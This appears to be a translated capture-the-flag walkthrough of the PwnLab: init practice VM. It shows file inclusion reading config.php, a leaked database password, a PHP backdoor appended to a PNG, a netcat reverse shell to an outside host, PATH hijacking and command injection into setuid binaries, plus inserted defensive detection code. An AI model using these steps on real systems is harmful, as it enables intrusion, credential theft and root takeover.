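⏰ Date: 2023.7.23
🗺️ Target VM address: ,158/
⚠️ All operations in this article were carried out in a simulated target-VM environment; never use them against a real environment without authorization.
🙏 My skills are limited, so please point out any mistakes. Thank you for reading!
This walkthrough draws on an expert's article:
/posts/vulnhub-pwnlab/
It has a lot worth learning from.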
Use nmap -sn to discover the VM host
nmap -sn 192.168.58.1/24
Starting Nmap 7.93 ( ) at 2023-07-23 14:56 中国标准时间
Nmap scan report for 192.168.58.157
Host is up (0.00s latency).
MAC Address: 00:0C:29:80:D6:BE (VMware)
Nmap scan report for 192.168.58.254
Host is up (0.00023s latency).
MAC Address: 00:50:56:E2:C0:4E (VMware)
Nmap scan report for 192.168.58.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 6.75 seconds
Quick nmap scan for open ports
nmap 192.168.58.157
Starting Nmap 7.93 ( ) at 2023-07-23 14:57 中国标准时间
Nmap scan report for 192.168.58.157
Host is up (0.00056s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
3306/tcp open mysql
MAC Address: 00:0C:29:80:D6:BE (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.75 seconds
Probe the open ports in more detail with nmap
nmap -sC -sV -T5 -p 80,111,3306 192.168.58.157
Starting Nmap 7.93 ( ) at 2023-07-23 14:59 中国标准时间
NSOCK ERROR [0.0370s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for 192.168.58.157
Host is up (0.00s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: PwnLab Intranet Image Hosting
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 32911/udp status
| 100024 1 47706/tcp status
| 100024 1 51656/udp6 status
|_ 100024 1 56184/tcp6 status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 10
| Version: 5.5.47-0+deb8u1
| Thread ID: 39
| Capabilities flags: 63487
| Some Capabilities: Speaks41ProtocolNew, Support41Auth, DontAllowDatabaseTableColumn, LongPassword, SupportsTransactions, LongColumnFlag, Speaks41ProtocolOld, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, InteractiveClient, FoundRows, SupportsLoadDataLocal, ODBCClient, SupportsCompression, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: V9W,qw#CigIu5F@NGZo@
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:80:D6:BE (VMware)
Fetch the site with curl
curl -v 192.168.58.157
* Trying 192.168.58.
* Connected to 192.168.58.157 (192.168.58.157) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.58.157
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 23 Jul 2023 07:02:36 GMT
< Server: Apache/2.4.10 (Debian)
< Vary: Accept-Encoding
< Content-Length: 332
< Content-Type: text/html; charset=UTF-8
<
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
Use this server to upload and share image files inside the intranet</center>
</body>
* Connection #0 to host 192.168.58.157 left intact
</html>
Scan the directories with dirsearch to see what turns up
PS D:\Network_security\dirsearch-0.4.3> python dirsearch.py -f -t 50 -e php -u 192.168.58.157
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 14331
Output File: D:\Network_security\dirsearch-0.4.3\reports\http_192.168.58.157_
Target: 192.168.58.157/
[15:47:12] 200 - 0B - /config.php
[15:47:19] 200 - 458B - /images/
[15:47:23] 200 - 164B - /login.php
[15:47:42] 200 - 19B - /upload.php
[15:47:42] 200 - 406B - /upload/
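After the directory scan we have the following leads:
1. upload.php and an upload directory exist, so there is a file upload feature
2. config.php may leak database information
First look at the upload directory; it is currently empty
Next, visiting upload.php requires being logged in
config.php obviously will not show its contents when requested directly; some technique is needed to read it. Reading a configuration file usually comes down to file inclusion
The URL shows the obvious signs of file inclusion
Reading config.php requires php://filter/convert.base64-encode/resource=
After a few tests I found that .php is appended automatically at the end of the URL, so leave .php off the input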
┌──(root㉿Eric)-[~]
└─# curl 192.168.58.157/?page=php://filter/convert.base64-encode/resource=config | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 405 100 405 0 0 174k 0 --:--:-- --:--:-- --:--:-- 197k
[images/pwnlab.png]
[ Home ] [ Login ] [ Upload ]
===============================================================================
PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+
┌──(root㉿Eric)-[~]
└─# curl 192.168.58.157/?page=php://filter/convert.base64-encode/resource=config | html2text | tail -n 1 | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 405 100 405 0 0 200k 0 --:--:-- --:--:-- --:--:-- 395k
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
Since we can read config.php, let's also read login.php, upload.php and index.php to see how they work
┌──(root㉿Eric)-[~]
└─# curl 192.168.58.157/?page=php://filter/convert.base64-encode/resource=index | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1097 100 1097 0 0 524k 0 --:--:-- --:--:-- --:--:-- 1071k
[images/pwnlab.png]
[ Home ] [ Login ] [ Upload ]
===============================================================================
PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/
Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/
cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4=
# Three lines of data are returned here, so tail -n 3 is used below
┌──(root㉿Eric)-[~]
└─# curl 192.168.58.157/?page=php://filter/convert.base64-encode/resource=index | html2text | tail -n 3 | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1097 100 1097 0 0 446k 0 --:--:-- --:--:-- --:--:-- 535k
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
	include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
	if (isset($_GET['page']))
	{
		include($_GET['page'].".php");
	}
	else
	{
		echo "Use this server to upload and share image files inside the intranet";
	}
?>
</center>
</body>
</html>
Analysing the source shows that when the cookie contains a lang parameter, the value of lang is included
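Added example, not part of the original write-up: a Python log check for the two include() inputs that index.php exposes, the page parameter and the lang cookie. The log lines are constructed, and logging the Cookie header as a final quoted field is an assumption about the server's LogFormat.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample: Apache "combined" lines with the Cookie header logged as
# a last quoted field (assumes the LogFormat was extended with "%{Cookie}i").
SAMPLE_LOG = '''\
192.168.58.1 - - [23/Jul/2023:07:02:36 +0000] "GET / HTTP/1.1" 200 332 "-" "curl/7.88.1" "-"
192.168.58.1 - - [23/Jul/2023:07:05:10 +0000] "GET /?page=login HTTP/1.1" 200 496 "-" "Mozilla/5.0" "-"
192.168.58.1 - - [23/Jul/2023:07:09:41 +0000] "GET /?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 405 "-" "curl/7.88.1" "-"
192.168.58.1 - - [23/Jul/2023:07:20:03 +0000] "GET /index.php HTTP/1.1" 200 612 "-" "curl/7.88.1" "lang=../upload/example.png"
192.168.58.1 - - [23/Jul/2023:07:21:17 +0000] "GET /?page=php%3A%2F%2Ffilter/convert.base64-encode/resource=login HTTP/1.1" 200 1377 "-" "curl/7.88.1" "-"
'''

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$')

def cookie_value(header, name):
    """Return one cookie's percent-decoded value from a Cookie header, or None."""
    for part in header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return unquote(value)
    return None

def findings_for(line):
    """Rules derived from index.php: `page` and the `lang` cookie both reach include()."""
    m = LINE_RE.match(line)
    if m is None:
        return []
    found = []
    # parse_qs percent-decodes the value, so encoded wrappers are matched too.
    for value in parse_qs(urlsplit(m["target"]).query).get("page", []):
        if "://" in value:
            found.append("stream-wrapper-in-page")
        if ".." in value:
            found.append("traversal-in-page")
    lang = cookie_value(m["cookie"], "lang")
    # A language file name never needs a path separator.
    if lang is not None and ("/" in lang or "\\" in lang):
        found.append("path-in-lang-cookie")
    return found

def scan(log_text):
    """Return [(line_number, [rule, ...])] for every line that trips a rule."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        found = findings_for(line.strip())
        if found:
            hits.append((number, found))
    return hits
```

Calling scan(SAMPLE_LOG) reports lines 3, 4 and 5; the ordinary ?page=login request on line 2 is not flagged.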
┌──(root㉿Eric)-[~]
└─# curl 192.168.58.157/?page=php://filter/convert.base64-encode/resource=login | html2text | tail -n 3 | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1377 100 1377 0 0 619k 0 --:--:-- --:--:-- --:--:-- 672k
<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);
if (isset($_POST['user']) and isset($_POST['pass']))
{
	$luser = $_POST['user'];
	$lpass = base64_encode($_POST['pass']);
	$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
	$stmt->bind_param('ss', $luser, $lpass);
	$stmt->execute();
	$stmt->store_Result();
	if ($stmt->num_rows == 1)
	{
		$_SESSION['user'] = $luser;
		header('Location: ?page=upload');
	}
	else
	{
		echo "Login failed.";
	}
}
else
{
	?>
	<form action="" method="POST">
	<label>Username: </label><input id="user" type="test" name="user"><br />
	<label>Password: </label><input id="pass" type="password" name="pass"><br />
	<input type="submit" name="submit" value="Login">
	</form>
	<?php
}
We can see that it uses a MySQL database and includes config.php. The SQL statement uses a prepared statement, so there is no SQL injection.
┌──(root㉿Eric)-[~]
└─# curl 192.168.58.157/?page=php://filter/convert.base64-encode/resource=upload | html2text | tail -n 2 | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2053 100 2053 0 0 873k 0 --:--:-- --:--:-- --:--:-- 1002k
>
<html><body><form action='' method='post' enctype='multipart/form-data'><input type='file' name='file' id='file' /><input type='submit' name='submit' value='Upload'/></form></body>
</html>
<?php
if(isset($_POST['submit'])) {
	if ($_FILES['file']['error'] <= 0) {
		$filename = $_FILES['file']['name'];
		$filetype = $_FILES['file']['type'];
		$uploaddir = 'upload/';
		$file_ext = strrchr($filename, '.');
		$imageinfo = getimagesize($_FILES['file']['tmp_name']);
		$whitelist = array(".jpg",".jpeg",".gif",".png");
		if (!(in_array($file_ext, $whitelist))) {
			die('Not allowed extension, please upload images only.');
		}
		if(strpos($filetype,'image') === false) {
			die('Error 001');
		}
		if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
			die('Error 002');
		}
		if(substr_count($filetype, '/')>1){
			die('Error 003');
		}
		$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
		if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
			echo "<img src=\"".$uploadfile."\"><br />";
		} else {
			die('Error 4');
		}
	}
}
?base64: invalid input
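The file upload uses a whitelist and checks the file type and extension
Next, connect to the database with the database account and password
Connect to the database with account root and password H4u%QJ_H99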
PS D:\> mysql -uroot -pH4u%QJ_H99 -h 192.168.58.157 Users
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 69
Server version: 5.5.47-0+deb8u1 (Debian)
Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Users |
+--------------------+
2 rows in set (0.00 sec)
mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)
mysql> select * from users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.00 sec)
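We can see that the passwords are base64-encoded, so write a Python script to decode them; leave the repetitive batch work to Python
# Python 2 syntax (run with python2 below)
import sys, base64
def decodePass(encoded_passwd):
    # base64 is reversible, so decoding returns the stored password
    passwd = base64.b64decode(encoded_passwd)
    return passwd
# argv[1] is a text file with one "user,base64-password" pair per line
with open(sys.argv[1]) as f:
    for line in f:
        (user, passwd) = line.split(',')
        print "%s: %s" % (user, decodePass(passwd))
The input file holds one user,password pair per line: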
kent,Sld6WHVCSkpOeQ==
mike,U0lmZHNURW42SQ==
kane,aVN2NVltMkdSbw==
┌──(root㉿Eric)-[/home/eric/myfiles]
└─# python2 passwd.
kent: JWzXuBJJNy
mike: SIfdsTEn6I
kane: iSv5Ym2GRo
Now we need to write a webshell into an image and upload it
We can start from a 1*1 image
┌──(eric㉿Eric)-[/mnt/d/XunleiDownload]
└─$ cat /usr/share/webshells/php/simple-backdoor.php >> 1x1.png
┌──(eric㉿Eric)-[/mnt/d/XunleiDownload]
└─$ cat 1x1.png
�PNGIDA[c�t����+viIEND�B`�<!-- Simple PHP backdoor by DK () -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: .php?cmd=cat+/etc/passwd
<!-- 2006 -->
Clicking it shows that it is accessible; it is just a single pixel in size
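Added example, not from the original post: upload.php's checks (extension, client-supplied type, getimagesize) all pass for a valid PNG that has extra bytes appended after the image. This Python check walks the PNG chunk list and rejects a file that carries data after IEND; it covers PNG only, and the 1x1 sample image and the appended bytes are constructed here.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

def _chunk(ctype, data):
    """Serialise one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

def make_1x1_png():
    """Constructed sample input: a valid 1x1 greyscale PNG built in memory."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one grey pixel
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))

def png_trailing_bytes(blob):
    """Walk the chunk list and return whatever follows the IEND chunk.

    Raises ValueError on a bad signature, truncated chunk, bad CRC or missing IEND.
    """
    if not blob.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        end = pos + 12 + length  # 4 length + 4 type + data + 4 CRC
        if end > len(blob):
            raise ValueError("truncated chunk")
        data = blob[pos + 8:end - 4]
        (crc,) = struct.unpack(">I", blob[end - 4:end])
        if crc != zlib.crc32(ctype + data) & 0xFFFFFFFF:
            raise ValueError("bad CRC")
        pos = end
        if ctype == b"IEND":
            return blob[pos:]
    raise ValueError("no IEND chunk")

def accept_upload(blob):
    """Accept only a well-formed PNG that ends exactly at its IEND chunk."""
    try:
        return png_trailing_bytes(blob) == b""
    except ValueError:
        return False
```

Trailing data is only one place to hide content (ancillary chunks are another), so re-encoding uploads and never passing request data to include() remain the actual fixes.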
Then use the lang cookie parameter found earlier to pass in the path of the image webshell
┌──(root㉿Eric)-[/home/eric/myfiles]
└─# curl --output - -b lang=../upload/ca56c702061e583af4bb4b38e0d51de3.png 192.168.58.157/index.php?cmd=whoami
�PNGIDA[c�t����+viIEND�B`�<!-- Simple PHP backdoor by DK () --><pre>www-data
</pre>
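#--output - writes the result to standard output
#-b adds a cookie named lang with the value ../upload/ca56c702061e583af4bb4b38e0d51de3.png
The command executed successfully; next we can use nc to get a reverse shell
Check for the nc command on the target system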
┌──(root㉿Eric)-[/home/eric/myfiles]
└─# curl --output - -b lang=../upload/ca56c702061e583af4bb4b38e0d51de3.png 192.168.58.157/index.php?cmd=whereis+nc
�PNGIDA[c�t����+viIEND�B`�<!-- Simple PHP backdoor by DK () --><pre>nc: /aditional /bin/nc /usr/share/man/man1/
</pre>
┌──(root㉿Eric)-[/home/eric/myfiles]
└─# curl --output - -b lang=../upload/ca56c702061e583af4bb4b38e0d51de3.png 192.168.58.157/index.php?cmd=which+nc
�PNGIDA[c�t����+viIEND�B`�<!-- Simple PHP backdoor by DK () --><pre>/bin/nc
</pre>
The target has nc, so now use the nc command for a reverse shell
Check which shell type the target supports
┌──(root㉿Eric)-[/home/eric/myfiles]
└─# curl --output - -b lang=../upload/ca56c702061e583af4bb4b38e0d51de3.png 192.168.58.157/index.php?cmd=echo+$SHELL
�PNGIDA[c�t����+viIEND�B`�<!-- Simple PHP backdoor by DK () --><pre>/bin/bash
</pre>
/bin/bash is supported, so that is what we use for the reverse shell
curl --output - -b lang=../upload/ca56c702061e583af4bb4b38e0d51de3.png 192.168.58.157/index.php?cmd=/bin/nc+-e+/bin/bash+192.168.10.1+5555
┌──(root㉿Eric)-[~]
└─# nc -nvlp 5555
Ncat: Version 7.94 ( )
Ncat: Listening on [::]:5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 192.168.10.1:2166.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@pwnlab:/var/www/html$ echo TERM=screen
echo TERM=screen
TERM=screen
www-data@pwnlab:/var/www/html$
With echo TERM=screen, clear can be used to clear the screen
See which users exist
www-data@pwnlab:/var/www/html$ getent passwd
getent passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash
mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
We see john, kent, mike and kane; try whether the earlier passwords can be used to switch user
www-data@pwnlab:/var/www/html$ su kane
su kane
Password: iSv5Ym2GRo
kane@pwnlab:/var/www/html$ cd /home/kane
cd /home/kane
kane@pwnlab:~$ ls -la
ls -la
total 28
drwxr-x--- 2 kane kane 4096 Mar 17 2016 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17 2016 .bashrc
-rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike
-rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile
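We are now in kane's home directory and find that the file msgmike has the s permission bit set; it is an executable that reports an error when run, so analyse it with strings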
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/: No such file or directory
kane@pwnlab:~$ strings msgmike
strings msgmike
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setregid
setreuid
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
QVh[
[^_]
cat /home/
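We can see that the cat command is called by a relative path rather than an absolute path; because the current directory has no cat command, it reports an error
So we can define a cat command for it
Create a cat command in the /tmp directory and add that directory to the PATH environment variable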
kane@pwnlab:/tmp$ echo "bash -i" > cat
echo "bash -i" > cat
kane@pwnlab:/tmp$ chmod 755 cat
chmod 755 cat
kane@pwnlab:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
kane@pwnlab:/tmp$ cd /home/kane
cd /home/kane
kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$ cd /home/mike
cd /home/mike
mike@pwnlab:/home/mike$ ls -la
ls -la
total 28
drwxr-x--- 2 mike mike 4096 Mar 17 2016 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 mike mike 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17 2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17 2016 msg2root
-rw-r--r-- 1 mike mike 675 Mar 17 2016 .profile
We are now mike and see another file with the s permission bit; analyse it with strings as well
mike@pwnlab:/home/mike$ strings msg2root
strings msg2root
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
stdin
fgets
asprintf
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Message for root:
/bin/echo %s >> /
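This time the echo command is called by its absolute path, and %s receives the user's input
The msg2root executable asks for user input, so we can separate commands with ;, for example a;/bin/bash;# . This runs echo a first, then /bin/bash, and the # comments out the rest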
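Added example, not code from the challenge binaries: a Python model of the two system() patterns that strings reveals, a bare cat resolved through the caller's PATH (msgmike) and user input formatted into a shell command line (msg2root), each next to a hardened form. The file names, the stand-in cat and the marker commands are constructed, and /bin/sh, /bin/cat and /bin/echo are assumed to exist.

```python
import os
import subprocess
import tempfile

SAFE_ENV = {"PATH": "/usr/bin:/bin"}  # chosen by the program, never inherited

def c_system(command, env):
    """Model of C system(): one string handed to /bin/sh -c with the caller's env."""
    done = subprocess.run(["/bin/sh", "-c", command], env=env,
                          capture_output=True, text=True)
    return done.stdout

def read_relative(path, env):
    # msgmike pattern: a bare "cat" is looked up through the caller's PATH.
    return c_system("cat " + path, env)

def read_hardened(path):
    # Absolute binary, argv list instead of a shell, environment set by the program.
    done = subprocess.run(["/bin/cat", "--", path], env=SAFE_ENV,
                          capture_output=True, text=True)
    return done.stdout

def append_via_shell(message, log, env):
    # msg2root pattern: the input becomes part of the command line, so the shell
    # treats ';' as a command separator and '#' as the start of a comment.
    return c_system("/bin/echo %s >> %s" % (message, log), env)

def append_hardened(message, log):
    # No shell and no child process: the message is only ever written as data.
    with open(log, "a") as fh:
        fh.write(message + "\n")

def demo():
    """Run both patterns on constructed files, using harmless marker commands."""
    with tempfile.TemporaryDirectory() as d:
        fake, note, log = (os.path.join(d, n) for n in ("cat", "note.txt", "msg.txt"))
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho HIJACKED\n")  # stand-in for a planted "cat"
        os.chmod(fake, 0o755)
        with open(note, "w") as fh:
            fh.write("hello\n")
        caller_env = {"PATH": d + ":/usr/bin:/bin"}  # PATH as set by the caller
        message = "a;echo INJECTED;#"  # constructed input with shell metacharacters
        out = {
            "relative": read_relative(note, caller_env),
            "hardened_read": read_hardened(note),
            "shell_append": append_via_shell(message, log, caller_env),
            "log_exists_after_shell": os.path.exists(log),
        }
        append_hardened(message, log)
        with open(log) as fh:
            out["log"] = fh.read()
        return out
```

In the shell variant the trailing # also comments out the >> redirection, so nothing reaches the log file and a is printed to the terminal instead, which matches the lone a in the session output.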
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: a;/bin/sh;#
a;/bin/sh;#
a
# cd /root;ls -la
cd /root;ls -la
total 20
drwx------ 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 21 root root 4096 Mar 17 2016 ..
lrwxrwxrwx 1 root root 9 Mar 17 2016 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
---------- 1 root root 1840 Mar 17
lrwxrwxrwx 1 root root 9 Mar 17 -> /dev/null
lrwxrwxrwx 1 root root 9 Mar 17 2016 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
Because we replaced the cat command earlier, cat has to be invoked as /bin/cat
# /bin/
/bin/
.-=~=-. .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ | | (__ _)
( _ __) | / / ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ | '_ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | __/ (_) | | | | (_| | | | (_| | |___ (_ ___)
(__ _) ____/___/|_| |_|__, |_| __,_|__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs (__ _)
( _ __) claor@PwnLab - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'
This article was published on 2024-02-04 22:13:59. Thank you for your support of this site!